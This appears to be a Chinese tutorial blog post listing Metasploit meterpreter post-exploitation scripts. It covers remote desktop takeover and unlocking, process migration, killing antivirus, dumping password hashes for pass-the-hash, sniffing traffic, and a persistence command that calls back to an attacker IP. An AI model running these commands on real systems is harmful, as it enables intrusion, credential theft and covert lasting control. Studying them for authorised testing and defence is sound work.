天天看點

metasploit——(四)使用meterpreter腳本

    通過“run  腳本名字”指令,可以在meterpreter終端中運作擴充腳本。腳本可能會直接運作,也可能提供如何使用的幫助。

  1、run vnc

    在受控系統上運作一個互動式的遠端圖形化工具,你可以使用VNC協定将受控系統的桌面通信通過隧道方式映射過來,使得你通路到遠端的圖形化桌面。在某些情況下,受控系統可能是被鎖定的,而你無法通路到桌面。。不用擔心強大的metasploit能夠幫助我們搞定一切: run screen_unlock 指令對目标機器上的桌面進行解鎖。。。。同理,run  screen 應該就是對遠端桌面進行鎖定。。

  2、run  post/windows/manage/migrate

    當我們攻擊系統時,常常是對諸如 IE之類的伺服器進行漏洞利用,如果目标主機關閉了浏覽器,meterpreter會話也将随之被關閉,進而導緻與目标系統的連接配接丢失。。為了避免這個問題,我們可以将meterpreter會話遷移到記憶體空間中的其他穩定的、不會被關閉的服務程序中,以維持穩定的系統控制連接配接。。

  3、run  killav

    關閉防毒軟體

   4、run hashdump

    擷取系統密碼哈希值的副本實施哈希值傳遞攻擊,或是進行哈希值暴力破解還原明文密碼。

   5、run  packetrecorder  -i  1

   檢視目标機上的所有流量 

  6、run scraper

     擷取系統資訊

   7、run  persistence  -X  -i  50 -p 443  -r 192.168.1.107

     確定系統重新開機後meterpreter還能運作。。

·

metasploit——(四)使用meterpreter腳本